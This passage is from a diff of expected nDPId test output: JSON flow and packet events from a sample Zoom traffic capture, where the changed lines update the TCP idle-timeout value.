Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569520471147,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1569520471147,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCtGEAAP8Rg4LAqAF1wKgBAcfxADUALsLBHCQBAAABAAAAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAE="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569520471188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1569520471188,"pkt":"KDc3AG3IEBMx8Tl2CABFAABSclkAADcRjXvAqAEBwKgBdQA1x\/EAPsuKHCSBgAABAAEAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAHADAABAAEAAKjAAARtXqBj"} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471189,"flow_last_seen":1569520471189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520471189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569520471189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520471189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGatnAqAF1bV6gY9ZXAbsw+fmWAAAAALAC\/\/9csgAAAgQFtAEDAwUBAQgKJZziLAAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569520471220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520471220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGd91tXqBjwKgBdQG71leHhddzMPn5l6ASqbBjhwAAAgQFrAQCCAp2KotLJZziLAEDAww="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569520471220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520471220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGauXAqAF1bV6gY9ZXAbsw+fmXh4XXdIAQECwrtgAAAQEICiWc4kt2KotL"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520471399,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEAA2VgAAAQEICiWc4viZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471189,"flow_last_seen":1569520471189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520471189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569520471189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520471189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGatnAqAF1bV6gY9ZXAbsw+fmWAAAAALAC\/\/9csgAAAgQFtAEDAwUBAQgKJZziLAAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569520471220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520471220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGd91tXqBjwKgBdQG71leHhddzMPn5l6ASqbBjhwAAAgQFrAQCCAp2KotLJZziLAEDAww="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569520471220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520471220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGauXAqAF1bV6gY9ZXAbsw+fmXh4XXdIAQECwrtgAAAQEICiWc4kt2KotL"} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569520471399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520471399,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEAA2VgAAAQEICiWc4viZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569520471748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471748,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHYY4AAEARSPnAqAF1bV6gY+PXImEAcwEfAQACfUZNNf\/9ojRJXQ1tO1HolgAAAAAAAAACAHoAKgB6ACoAAABADhc935YCXvuVxCQMI1O\/y\/Bgvpncu9jEece5cy1sdfpDYvCDXrg+TanGp+bzCbMeQN8Pa7V1aoQPcx2bwfanLQAAAAA="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} @@ -175,38 +175,38 @@ 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466080,"flow_last_seen":1569520472536,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":796,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466080,"flow_last_seen":1569520472536,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":796,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 